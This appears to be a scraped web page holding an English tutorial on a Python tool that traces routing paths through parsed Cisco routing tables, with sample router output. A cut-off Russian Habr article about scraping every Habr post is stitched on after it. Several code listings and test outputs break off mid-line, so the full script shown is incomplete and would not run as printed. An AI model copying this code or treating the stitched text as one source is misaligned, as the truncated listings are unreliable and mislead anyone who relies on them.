interface_list.append((interface, subnet,))
if not interface_list:
print('Failed to find routing table entries in given output')
return None
# parse static and dynamic route strings in text
for raw_route_string in REGEXP_ROUTE.finditer(raw_routing_table):
subnet = (
raw_route_string.group('subnet')
+ convert_netmask_to_prefix_length(
raw_route_string.group('maskOrPrefixLength')
)
)
via_portion = raw_route_string.group('viaPortion')
next_hops = []
if via_portion.count('via') > 1:
for line in via_portion.splitlines():
if line:
next_hops.append(REGEXP_VIA_PORTION.match(line).group(1))
else:
next_hops.append(REGEXP_VIA_PORTION.match(via_portion).group(1))
route_tree[subnet] = (next_hops, raw_route_string.group(0))
router = {
'routing_table': route_tree,
'interface_list': interface_list,
}
return router
```
To improve extensibility, let's wrap all parsers into another function:
```
def parse_text_routing_table(raw_routing_table):
"""
Parser functions wrapper.
Add additional parsers for alternative routing table syntaxes here.
"""
router = parse_show_ip_route_ios_like(raw_routing_table)
if router:
return router
```
Finally, we need a function to go through a directory containing our routing table text files.
It will take a directory path as an input and return a dictionary of all discovered routers:
```
def do_parse_directory(rt_directory):
"""
Go through the specified directory and parse all .txt files.
Generate router objects based on parse result if any.
Populate new_routers with those router objects.
The default key for each router object is FILENAME.
Return new_routers.
"""
new_routers = {}
if not os.path.isdir(rt_directory):
print(
"{} directory does not exist.".format(rt_directory)
+ "Check rt_directory variable value."
)
return None
start_time = time()
print("Initializing files...")
for FILENAME in os.listdir(rt_directory):
if FILENAME.endswith('.txt'):
file_init_start_time = time()
with open(os.path.join(rt_directory, FILENAME), 'r') as f:
print('Opening {}'.format(FILENAME))
raw_table = f.read()
new_router = parse_text_routing_table(raw_table)
router_id = FILENAME.replace('.txt', '')
if new_router:
new_routers[router_id] = new_router
if new_router['interface_list']:
for iface, addr in new_router['interface_list']:
GLOBAL_INTERFACE_TREE[addr] = (router_id, iface,)
else:
print('Failed to parse ' + FILENAME)
print(
FILENAME
+ " parsing has been completed in {} sec".format(
"{:.3f}".format(time() - file_init_start_time)
)
)
else:
if not new_routers:
print(
"Could not find any valid .txt files with routing tables"
+ " in {} directory".format(rt_directory)
)
else:
print(
"\nAll files have been initialized"
+ " in {} sec".format("{:.3f}".format(time() - start_time))
)
return new_routers
```
Once we have the structured data, we can move to the routing paths analysis part of the task.
Analyzing Routing Paths
-----------------------
In general, the task at this stage is to analyze the network graph. Routers are graph vertices and L3-links are graph edges. *ROUTERS* dictionary stores Router IDs as keys and next-hop IP-addresses as values. *GLOBAL\_INTERFACE\_TREE* returns RIDs by next-hop IP-addresses at the same time. So *ROUTERS* and *GLOBAL\_INTERFACE\_TREE* together define a graph adjacency table.
If we draw parallels with real routers, to find a path, you need to reproduce their high-level work logic (not taking RIB/FIB/ASIC and different optimizations into account) during the packet processing: from routing table lookup to ARP-request (*router\_id* in our case) and further packet forwarding or drop depending on the result.
To achieve this, let's implement a recursive path search algorithm. Each path segment will be represented by a list containing *router\_id* (RID) and *raw\_route\_string* (matched route string). The current path will be stored in a *path* tuple. As we might have multiple paths, the resulting list of them will be stored in a *paths* tuple. Individual *path* will be appended to *paths* once the current path analysis reached the end (the destination or no route to the destination at some point) or on routing loop detection. The function will take a RID we start from and a target IP we are searching path to as an input and return resulting *paths*.
```
def trace_route(source_router_id, target_ip, path=[]):
"""
Performs recursive path search from source Router ID (RID) to target subnet.
Returns tuple of path tuples.
Each path tuple contains a sequence of Router IDs with matched route strings.
Multiple paths are supported.
"""
if not source_router_id:
return [path + [(None, None)]]
current_router = ROUTERS[source_router_id]
next_hop, raw_route_string = route_lookup(target_ip, current_router)
path = path + [(source_router_id, raw_route_string)]
paths = []
if next_hop:
if nexthop_is_local(next_hop[0]):
return [path]
for nh in next_hop:
next_hop_rid = get_rid_by_interface_ip(nh)
if next_hop_rid not in [r[0] for r in path]:
inner_path = trace_route(next_hop_rid, target_ip, path)
for p in inner_path:
paths.append(p)
else:
path = path + [(next_hop_rid+"<
```
Let's also implement a function to provide interactive path lookup ability to our script user.
It will perform a path search to the given IP-address from all the discovered routers:
```
def do_user_interactive_search():
"""
Provides interactive search dialog for users.
Asks user for target subnet or host in CIDR notation.
Validates input. Prints error and goes back to start for invalid input.
Executes path search to given target from each router in global ROUTERS.
Prints formatted path search results.
Goes back to start.
"""
while True:
print('\n')
target_subnet = input('Enter Target Subnet or Host: ')
if not target_subnet:
continue
if not REGEXP_INPUT_IPv4.match(target_subnet.replace(' ', '')):
print("incorrect input")
continue
lookup_start_time = time()
for rtr in ROUTERS.keys():
subsearch_start_time = time()
result = trace_route(rtr, target_subnet)
if result:
print("\n")
print("PATHS TO {} FROM {}".format(target_subnet, rtr))
n = 1
print('Detailed info:')
for r in result:
print("Path {}:".format(n))
print([h[0] for h in r])
for hop in r:
print("ROUTER: {}".format(hop[0]))
print("Matched route string: \n{}".format(hop[1]))
else:
print('\n')
n += 1
else:
print(
"Path search on {} has been completed in {} sec".format(
rtr, "{:.3f}".format(time() - subsearch_start_time)
)
)
else:
print(
"\nFull search has been completed in {} sec".format(
"{:.3f}".format(time() - lookup_start_time),
)
)
```
Bringing the logic together:
```
def main():
global ROUTERS
ROUTERS = do_parse_directory(RT_DIRECTORY)
if ROUTERS:
do_user_interactive_search()
if __name__ == "__main__":
main()
```
And here is a complete solution!
**The Code**
```
import os
import re
import pytricia
from time import time
# Path to directory with routing table files.
# Each routing table MUST be in a separate .txt file.
RT_DIRECTORY = "./routing_tables"
# RegEx template string for IPv4 address matching.
REGEXP_IPv4_STR = (
r'((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.'
+ r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.'
+ r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.'
+ r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'
)
# IPv4 CIDR notation matching in user input.
REGEXP_INPUT_IPv4 = re.compile(r"^" + REGEXP_IPv4_STR + r"(\/\d\d?)?$")
# Local and Connected route strings matching.
REGEXP_ROUTE_LOCAL_CONNECTED = re.compile(
r'^(?P[L|C])\s+'
+ r'((?P\d\d?\d?\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?)'
+ r'\s?'
+ r'(?P(\/\d\d?)?'
+ r'|(\d\d?\d?\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?)?))'
+ r'\ is\ directly\ connected\,\ '
+ r'(?P\S+)',
re.MULTILINE
)
# Static and dynamic route strings matching.
REGEXP\_ROUTE = re.compile(
r'^(\S\S?\\*?\s?\S?\S?)'
+ r'\s+'
+ r'((?P\d\d?\d?\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?)'
+ r'\s?'
+ r'(?P(\/\d\d?)?'
+ r'|(\d\d?\d?\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?)?))'
+ r'\s\*'
+ r'(?P(?:\n?\s+(\[\d\d?\d?\/\d+\])\s+'
+ r'via\s+(\d\d?\d?\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?)(.\*)\n?)+)',
re.MULTILINE
)
# Route string VIA portion matching.
REGEXP\_VIA\_PORTION = re.compile(
r'.\*via\s+(\d\d?\d?\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?).\*'
)
# Store for 'router' objects generated from input routing table files.
# Each file is represented by a single 'router' object.
# Router is referenced by Router ID (RID).
# RID is filename by default.
# Format:
#
# ROUTERS = {
# 'RID1': {'routing\_table': {}, 'interface\_list': ()},
# 'RID\_N': {'routing\_table': {}, 'interface\_list': ()},
# }
#
ROUTERS = {}
# Global search tree for Interface IP address to Router ID (RID) resolving.
# Stores Interface IP addresses as keys.
# Returns (RID, interfaceID) list.
# Interface IP addresses SHOULD be globally unique across the inspected topology.
GLOBAL\_INTERFACE\_TREE = pytricia.PyTricia()
def parse\_show\_ip\_route\_ios\_like(raw\_routing\_table):
"""
Parser for routing table text output.
Compatible with both Cisco IOS(IOS-XE) 'show ip route'
and Cisco ASA 'show route' output format.
Processes input text file and write into Python data structures.
Builds internal PyTricia search tree in 'route\_tree'.
Generates local interface list for a router in 'interface\_list'
Returns 'router' dictionary object with parsed data.
"""
router = {}
route\_tree = pytricia.PyTricia()
interface\_list = []
# Parse Local and Connected route strings in text.
for raw\_route\_string in REGEXP\_ROUTE\_LOCAL\_CONNECTED.finditer(raw\_routing\_table):
subnet = (
raw\_route\_string.group('ipaddress')
+ convert\_netmask\_to\_prefix\_length(
raw\_route\_string.group('maskOrPrefixLength')
)
)
interface = raw\_route\_string.group('interface')
route\_tree[subnet] = ((interface,), raw\_route\_string.group(0))
if raw\_route\_string.group('routeType') == 'L':
interface\_list.append((interface, subnet,))
if not interface\_list:
print('Failed to find routing table entries in given output')
return None
# parse static and dynamic route strings in text
for raw\_route\_string in REGEXP\_ROUTE.finditer(raw\_routing\_table):
subnet = (
raw\_route\_string.group('subnet')
+ convert\_netmask\_to\_prefix\_length(
raw\_route\_string.group('maskOrPrefixLength')
)
)
via\_portion = raw\_route\_string.group('viaPortion')
next\_hops = []
if via\_portion.count('via') > 1:
for line in via\_portion.splitlines():
if line:
next\_hops.append(REGEXP\_VIA\_PORTION.match(line).group(1))
else:
next\_hops.append(REGEXP\_VIA\_PORTION.match(via\_portion).group(1))
route\_tree[subnet] = (next\_hops, raw\_route\_string.group(0))
router = {
'routing\_table': route\_tree,
'interface\_list': interface\_list,
}
return router
def parse\_text\_routing\_table(raw\_routing\_table):
"""
Parser functions wrapper.
Add additional parsers for alternative routing table syntaxes here.
"""
router = parse\_show\_ip\_route\_ios\_like(raw\_routing\_table)
if router:
return router
def convert\_netmask\_to\_prefix\_length(mask\_or\_pref):
"""
Gets subnet\_mask (XXX.XXX.XXX.XXX) of /prefix\_length (/XX).
For subnet\_mask, converts it to /prefix\_length and returns the result.
For /prefix\_length, returns as is.
For empty input, returns "" string.
"""
if not mask\_or\_pref:
return ""
if re.match(r"^\/\d\d?$", mask\_or\_pref):
return mask\_or\_pref
if re.match(r"^\d\d?\d?\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?$",
mask\_or\_pref):
return (
"/"
+ str(sum([bin(int(x)).count("1") for x in mask\_or\_pref.split(".")]))
)
return ""
def route\_lookup(destination, router):
"""
Performs route\_tree lookup in passed router object
for passed destination subnet.
Returns list of next\_hops with original route strings or (None, None)
depending on the lookup result.
"""
if destination in router['routing\_table']:
return router['routing\_table'][destination]
else:
return (None, None)
def get\_rid\_by\_interface\_ip(interface\_ip):
"""Returns RouterID by Interface IP address which it belongs to."""
if interface\_ip in GLOBAL\_INTERFACE\_TREE:
return GLOBAL\_INTERFACE\_TREE[interface\_ip][0]
def nexthop\_is\_local(next\_hop):
"""
Check if next-hop points to the local interface.
Will be True for Connected and Local route strings on Cisco devices.
"""
interface\_types = (
'Eth', 'Fast', 'Gig', 'Ten', 'Port',
'Serial', 'Vlan', 'Tunn', 'Loop', 'Null'
)
for type in interface\_types:
if next\_hop.startswith(type):
return True
def trace\_route(source\_router\_id, target\_ip, path=[]):
"""
Performs recursive path search from source Router ID (RID) to the target subnet.
Returns tuple of path tuples.
Each path tuple contains a sequence of Router IDs with matched route strings.
Multiple paths are supported.
"""
if not source\_router\_id:
return [path + [(None, None)]]
current\_router = ROUTERS[source\_router\_id]
next\_hop, raw\_route\_string = route\_lookup(target\_ip, current\_router)
path = path + [(source\_router\_id, raw\_route\_string)]
paths = []
if next\_hop:
if nexthop\_is\_local(next\_hop[0]):
return [path]
for nh in next\_hop:
next\_hop\_rid = get\_rid\_by\_interface\_ip(nh)
if next\_hop\_rid not in [r[0] for r in path]:
inner\_path = trace\_route(next\_hop\_rid, target\_ip, path)
for p in inner\_path:
paths.append(p)
else:
path = path + [(next\_hop\_rid+"<
```
Testing
-------
I used a small topology consisting of four Cisco [CSR-1000v](https://www.cisco.com/c/en/us/products/collateral/routers/cloud-services-router-1000v-series/datasheet-c78-733443.html) routers for testing:

They are interconnected with GigabitEthernet 2 and 3 interfaces. All adjacent routers are EIGRP neighbors. All Connected networks are being advertised, including Loopback addresses behind each router. Besides, csr1000v-01 and csr1000v-04 have a pair of GRE tunnels between them. Both of them have a static route for 10.0.0.0/8 subnet pointing to remote GRE tunnel IP forming a routing loop.
**csr1000v-01#show ip route**
```
Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2
i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
ia - IS-IS inter area, * - candidate default, U - per-user static route
o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP
a - application route
+ - replicated route, % - next hop override, p - overrides from PfR
Gateway of last resort is not set
S 10.0.0.0/8 [1/0] via 192.168.142.2
[1/0] via 192.168.141.2
172.16.0.0/16 is variably subnetted, 2 subnets, 2 masks
C 172.16.114.0/24 is directly connected, GigabitEthernet2
L 172.16.114.5/32 is directly connected, GigabitEthernet2
192.168.2.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.2.0/24 is directly connected, GigabitEthernet1
L 192.168.2.201/32 is directly connected, GigabitEthernet1
192.168.12.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.12.0/24 is directly connected, GigabitEthernet2
L 192.168.12.201/32 is directly connected, GigabitEthernet2
192.168.13.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.13.0/24 is directly connected, GigabitEthernet3
L 192.168.13.201/32 is directly connected, GigabitEthernet3
D 192.168.24.0/24 [90/3072] via 192.168.12.202, 00:06:56, GigabitEthernet2
D 192.168.34.0/24 [90/3072] via 192.168.13.203, 00:06:56, GigabitEthernet3
192.168.141.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.141.0/30 is directly connected, Tunnel141
L 192.168.141.1/32 is directly connected, Tunnel141
192.168.142.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.142.0/30 is directly connected, Tunnel142
L 192.168.142.1/32 is directly connected, Tunnel142
192.168.201.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.201.0/24 is directly connected, Loopback201
L 192.168.201.201/32 is directly connected, Loopback201
D 192.168.202.0/24
[90/130816] via 192.168.12.202, 00:05:44, GigabitEthernet2
D 192.168.203.0/24
[90/130816] via 192.168.13.203, 00:06:22, GigabitEthernet3
D 192.168.204.0/24
[90/131072] via 192.168.13.203, 00:06:56, GigabitEthernet3
[90/131072] via 192.168.12.202, 00:06:56, GigabitEthernet2
```
**csr1000v-02#show ip route**
```
Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2
i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
ia - IS-IS inter area, * - candidate default, U - per-user static route
o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP
a - application route
+ - replicated route, % - next hop override, p - overrides from PfR
Gateway of last resort is not set
192.168.2.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.2.0/24 is directly connected, GigabitEthernet1
L 192.168.2.202/32 is directly connected, GigabitEthernet1
192.168.12.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.12.0/24 is directly connected, GigabitEthernet2
L 192.168.12.202/32 is directly connected, GigabitEthernet2
D 192.168.13.0/24 [90/3072] via 192.168.12.201, 00:46:17, GigabitEthernet2
192.168.24.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.24.0/24 is directly connected, GigabitEthernet3
L 192.168.24.202/32 is directly connected, GigabitEthernet3
D 192.168.34.0/24 [90/3072] via 192.168.24.204, 00:46:15, GigabitEthernet3
D 192.168.201.0/24
[90/130816] via 192.168.12.201, 00:36:59, GigabitEthernet2
192.168.202.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.202.0/24 is directly connected, Loopback202
L 192.168.202.202/32 is directly connected, Loopback202
D 192.168.203.0/24
[90/131072] via 192.168.24.204, 00:06:31, GigabitEthernet3
[90/131072] via 192.168.12.201, 00:06:31, GigabitEthernet2
D 192.168.204.0/24
[90/130816] via 192.168.24.204, 00:37:26, GigabitEthernet3
```
**csr1000v-03#show ip route**
```
Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2
i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
ia - IS-IS inter area, * - candidate default, U - per-user static route
o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP
a - application route
+ - replicated route, % - next hop override, p - overrides from PfR
Gateway of last resort is not set
192.168.2.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.2.0/24 is directly connected, GigabitEthernet1
L 192.168.2.203/32 is directly connected, GigabitEthernet1
D 192.168.12.0/24 [90/3072] via 192.168.13.201, 00:46:12, GigabitEthernet3
192.168.13.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.13.0/24 is directly connected, GigabitEthernet3
L 192.168.13.203/32 is directly connected, GigabitEthernet3
D 192.168.24.0/24 [90/3072] via 192.168.34.204, 00:46:12, GigabitEthernet2
192.168.34.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.34.0/24 is directly connected, GigabitEthernet2
L 192.168.34.203/32 is directly connected, GigabitEthernet2
D 192.168.201.0/24
[90/130816] via 192.168.13.201, 00:36:56, GigabitEthernet3
D 192.168.202.0/24
[90/131072] via 192.168.34.204, 00:05:51, GigabitEthernet2
[90/131072] via 192.168.13.201, 00:05:51, GigabitEthernet3
192.168.203.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.203.0/24 is directly connected, Loopback203
L 192.168.203.203/32 is directly connected, Loopback203
D 192.168.204.0/24
[90/130816] via 192.168.34.204, 00:37:22, GigabitEthernet2
```
**csr1000v-04#show ip route**
```
Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2
i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
ia - IS-IS inter area, * - candidate default, U - per-user static route
o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP
a - application route
+ - replicated route, % - next hop override, p - overrides from PfR
Gateway of last resort is not set
S 10.0.0.0/8 [1/0] via 192.168.142.1
[1/0] via 192.168.141.1
192.168.2.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.2.0/24 is directly connected, GigabitEthernet1
L 192.168.2.204/32 is directly connected, GigabitEthernet1
D 192.168.12.0/24 [90/3072] via 192.168.24.202, 00:46:17, GigabitEthernet3
D 192.168.13.0/24 [90/3072] via 192.168.34.203, 00:46:19, GigabitEthernet2
192.168.24.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.24.0/24 is directly connected, GigabitEthernet3
L 192.168.24.204/32 is directly connected, GigabitEthernet3
192.168.34.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.34.0/24 is directly connected, GigabitEthernet2
L 192.168.34.204/32 is directly connected, GigabitEthernet2
192.168.141.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.141.0/30 is directly connected, Tunnel141
L 192.168.141.2/32 is directly connected, Tunnel141
192.168.142.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.142.0/30 is directly connected, Tunnel142
L 192.168.142.2/32 is directly connected, Tunnel142
D 192.168.201.0/24
[90/131072] via 192.168.34.203, 00:37:02, GigabitEthernet2
[90/131072] via 192.168.24.202, 00:37:02, GigabitEthernet3
D 192.168.202.0/24
[90/130816] via 192.168.24.202, 00:05:57, GigabitEthernet3
D 192.168.203.0/24
[90/130816] via 192.168.34.203, 00:06:34, GigabitEthernet2
192.168.204.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.204.0/24 is directly connected, Loopback204
L 192.168.204.204/32 is directly connected, Loopback204
```
Let's save *show ip route* files into separate files named by hostnames inside *./routing\_tables/* directory.
Now we can run the script:
**$ python3.7 traceroute\_by\_routing\_tables.py**
```
$ python3.7 traceroute_by_routing_tables.py
Initializing files...
Opening csr1000v-01.txt
csr1000v-01.txt parsing has been completed in 0.001 sec
Opening csr1000v-02.txt
csr1000v-02.txt parsing has been completed in 0.001 sec
Opening csr1000v-03.txt
csr1000v-03.txt parsing has been completed in 0.001 sec
Opening csr1000v-04.txt
csr1000v-04.txt parsing has been completed in 0.001 sec
All files have been initialized in 0.003 sec
Enter Target Subnet or Host:
```
All the files are processed as expected. The script expects an IP-address input to analyze paths.
Let's put several IP-addresses subsequently and compare the output with the data from our routers:
**Looking up paths to 192.168.204.204 (Loopback204 on csr1000v-04)**
All the routers should have paths to this destination.
**Enter Target Subnet or Host: 192.168.204.204**
```
Enter Target Subnet or Host: 192.168.204.204
PATHS TO 192.168.204.204 FROM csr1000v-04
Detailed info:
Path 1:
['csr1000v-04']
ROUTER: csr1000v-04
Matched route string:
L 192.168.204.204/32 is directly connected, Loopback204
Path search on csr1000v-04 has been completed in 0.000 sec
PATHS TO 192.168.204.204 FROM csr1000v-03
Detailed info:
Path 1:
['csr1000v-03', 'csr1000v-04']
ROUTER: csr1000v-03
Matched route string:
D 192.168.204.0/24
[90/130816] via 192.168.34.204, 00:37:22, GigabitEthernet2
ROUTER: csr1000v-04
Matched route string:
L 192.168.204.204/32 is directly connected, Loopback204
Path search on csr1000v-03 has been completed in 0.000 sec
PATHS TO 192.168.204.204 FROM csr1000v-02
Detailed info:
Path 1:
['csr1000v-02', 'csr1000v-04']
ROUTER: csr1000v-02
Matched route string:
D 192.168.204.0/24
[90/130816] via 192.168.24.204, 00:37:26, GigabitEthernet3
ROUTER: csr1000v-04
Matched route string:
L 192.168.204.204/32 is directly connected, Loopback204
Path search on csr1000v-02 has been completed in 0.000 sec
PATHS TO 192.168.204.204 FROM csr1000v-01
Detailed info:
Path 1:
['csr1000v-01', 'csr1000v-03', 'csr1000v-04']
ROUTER: csr1000v-01
Matched route string:
D 192.168.204.0/24
[90/131072] via 192.168.13.203, 00:06:56, GigabitEthernet3
[90/131072] via 192.168.12.202, 00:06:56, GigabitEthernet2
ROUTER: csr1000v-03
Matched route string:
D 192.168.204.0/24
[90/130816] via 192.168.34.204, 00:37:22, GigabitEthernet2
ROUTER: csr1000v-04
Matched route string:
L 192.168.204.204/32 is directly connected, Loopback204
Path 2:
['csr1000v-01', 'csr1000v-02', 'csr1000v-04']
ROUTER: csr1000v-01
Matched route string:
D 192.168.204.0/24
[90/131072] via 192.168.13.203, 00:06:56, GigabitEthernet3
[90/131072] via 192.168.12.202, 00:06:56, GigabitEthernet2
ROUTER: csr1000v-02
Matched route string:
D 192.168.204.0/24
[90/130816] via 192.168.24.204, 00:37:26, GigabitEthernet3
ROUTER: csr1000v-04
Matched route string:
L 192.168.204.204/32 is directly connected, Loopback204
Path search on csr1000v-01 has been completed in 0.000 sec
Full search has been completed in 0.001 sec
```
The script found some paths. Now let's check the route selection right on csr1000v-01:
**csr1000v-01#show ip route 192.168.204.204**
```
csr1000v-01#show ip route 192.168.204.204
Routing entry for 192.168.204.0/24
Known via "eigrp 200", distance 90, metric 131072, type internal
Redistributing via eigrp 200
Last update from 192.168.13.203 on GigabitEthernet3, 00:02:15 ago
Routing Descriptor Blocks:
192.168.13.203, from 192.168.13.203, 00:02:15 ago, via GigabitEthernet3
Route metric is 131072, traffic share count is 1
Total delay is 5020 microseconds, minimum bandwidth is 1000000 Kbit
Reliability 255/255, minimum MTU 1500 bytes
Loading 1/255, Hops 2
* 192.168.12.202, from 192.168.12.202, 00:02:15 ago, via GigabitEthernet2
Route metric is 131072, traffic share count is 1
Total delay is 5020 microseconds, minimum bandwidth is 1000000 Kbit
Reliability 255/255, minimum MTU 1500 bytes
Loading 1/255, Hops 2
```
csr1000v-01 displays two equal-cost router learned by EIGRP through csr1000v-02 and csr1000v-03.
The script returns both available paths: ['csr1000v-01', 'csr1000v-03', 'csr1000v-04'] and ['csr1000v-01', 'csr1000v-02', 'csr1000v-04'].
To be sure:
**csr1000v-02#show ip route 192.168.204.204**
```
csr1000v-02#show ip route 192.168.204.204
Routing entry for 192.168.204.0/24
Known via "eigrp 200", distance 90, metric 130816, type internal
Redistributing via eigrp 200
Last update from 192.168.24.204 on GigabitEthernet3, 00:08:48 ago
Routing Descriptor Blocks:
* 192.168.24.204, from 192.168.24.204, 00:08:48 ago, via GigabitEthernet3
Route metric is 130816, traffic share count is 1
Total delay is 5010 microseconds, minimum bandwidth is 1000000 Kbit
Reliability 255/255, minimum MTU 1500 bytes
Loading 1/255, Hops 1
```
**csr1000v-03#show ip route 192.168.204.204**
```
csr1000v-3#show ip route 192.168.204.204
Routing entry for 192.168.204.0/24
Known via "eigrp 200", distance 90, metric 130816, type internal
Redistributing via eigrp 200
Last update from 192.168.34.204 on GigabitEthernet2, 00:08:45 ago
Routing Descriptor Blocks:
* 192.168.34.204, from 192.168.34.204, 00:08:45 ago, via GigabitEthernet2
Route metric is 130816, traffic share count is 1
Total delay is 5010 microseconds, minimum bandwidth is 1000000 Kbit
Reliability 255/255, minimum MTU 1500 bytes
Loading 1/255, Hops 1
```
**csr1000v-04#show ip route 192.168.204.204**
```
csr1000v-04#show ip route 192.168.204.204
Routing entry for 192.168.204.204/32
Known via "connected", distance 0, metric 0 (connected)
Routing Descriptor Blocks:
* directly connected, via Loopback204
Route metric is 0, traffic share count is 1
```
Both csr1000v-02 and csr1000v-03 have a single route learned by EIGRP to csr1000v-4.
On csr1000v-04, the route leads to a Connected network on Loopback204.
The script output is correct: ['csr1000v-02', 'csr1000v-04'] from csr1000v-02, ['csr1000v-03', 'csr1000v-04'] from csr1000v-03, and a route to itself ['csr1000v-04'] from csr1000v-04.
**Looking up 10.10.10.0/24 (does not exist in the topology). Also a routing loop test case.**
**Enter Target Subnet or Host: 10.10.10.0/24**
```
Enter Target Subnet or Host: 10.10.10.0/24
PATHS TO 10.10.10.0/24 FROM csr1000v-04
Detailed info:
Path 1:
['csr1000v-04', 'csr1000v-01', 'csr1000v-04<
```
We've got result. Let's check the routers:
**csr1000v-01#show ip route 10.10.10.0 255.255.255.0**
```
csr1000v-01#show ip route 10.10.10.0 255.255.255.0
Routing entry for 10.0.0.0/8
Known via "static", distance 1, metric 0
Routing Descriptor Blocks:
* 192.168.142.2
Route metric is 0, traffic share count is 1
192.168.141.2
Route metric is 0, traffic share count is 1
```
**csr1000v-04#show ip route 10.10.10.0 255.255.255.0**
```
csr1000v-04#show ip route 10.10.10.0 255.255.255.0
Routing entry for 10.0.0.0/8
Known via "static", distance 1, metric 0
Routing Descriptor Blocks:
192.168.142.1
Route metric is 0, traffic share count is 1
* 192.168.141.1
Route metric is 0, traffic share count is 1
```
As discussed, csr1000v-01 and csr1000v-04 have equal-cost static routes to a wide 10.0.0.0/8 network pointing to each other through the tunnel interfaces. It creates a routing loop. The script successfully detects this and shows both paths for each:
```
PATHS TO 10.10.10.0/24 FROM csr1000v-01
Path 1:
['csr1000v-01', 'csr1000v-04', 'csr1000v-01<
```
**csr1000v-02#show ip route 10.10.10.0 255.255.255.0**
```
csr1000v-02#show ip route 10.10.10.0 255.255.255.0
% Network not in table
```
**csr1000v-3#show ip route 10.10.10.0 255.255.255.0**
```
csr1000v-3#show ip route 10.10.10.0 255.255.255.0
% Network not in table
```
csr1000v-02 and csr1000v-03 have no route to such destination. The script shows the same result.
All common test cases are covered. The script result matches the output we get from the actual network devices using CLI.
Conclusion
----------
The resulting solution is not perfect but it provides great lookup speed thanks to efficient algorithms and successfully solves the original task. The source code is published on my [GitHub page](https://github.com/iDebugAll/toolz/tree/master/traceroute_by_routing_tables).
The solution has some room for improvement and adding new analysis features. Additional parsers for alternative routing table syntax can easily be added by design. IPv6 is supported by *PyTricia* library natively.
I also tested the script on a BGP Full View routing table output with 700,000+ prefixes. On my good old MacBook Pro with Intel Core i5 and 8GB RAM, an initialization time takes less than 10 seconds. Memory consumption is around 320-350MB. Once it is initialized, any lookup to a routing table of that size still takes milliseconds as expected.
In 2021, some full-blown network analysis tools like [PyATS](https://developer.cisco.com/docs/pyats/) and [Batfish](https://www.batfish.org) could be a better starting point for more complex scenarios. However, being able to develop custom tools for such corner cases is still relevant.
Hope it helps someone solve some real issues or inspire to develop some automation on his or her own.
Thank you for reading. | https://habr.com/ru/post/539436/ | null | en | null |
# Как я парсил Хабр, часть 1: тренды
Когда был доеден новогодний оливье, мне стало нечего делать, и я решил скачать себе на компьютер все статьи с Хабрахабра (и смежных платформ) и поисследовать.
Получилось несколько интересных сюжетов. Первый из них — это развитие формата и тематики статей за 12 лет существования сайта. Например, достаточно показательна динамика некоторых тем. Продолжение — под катом.

Процесс парсинга
----------------
Чтобы понять, как развивался Хабр, нужно было обойти по все его статьи и выделить из них метаинформацию (например, даты). Обход дался легко, потому что ссылки на все статьи имеют вид "habrahabr.ru/post/337722/", причём номера задаются строго по порядку. Зная, что последний пост имеет номер чуть меньше 350 тысяч, я просто прошёлся по всем возможным id документов циклом (код на Python):
```
import numpy as np
from multiprocessing import Pool
with Pool(100) as p:
docs = p.map(download_document, np.arange(350000))
```
Функция `download_document` пытается загружает страницу с соответствующим id и пытается вытащить из структуры html содержательную информацию.
```
import requests
from bs4 import BeautifulSoup
def download_document(pid):
""" Download and process a Habr document and its comments """
# выгрузка документа
r = requests.get('https://habrahabr.ru/post/' +str(pid) + '/')
# парсинг документа
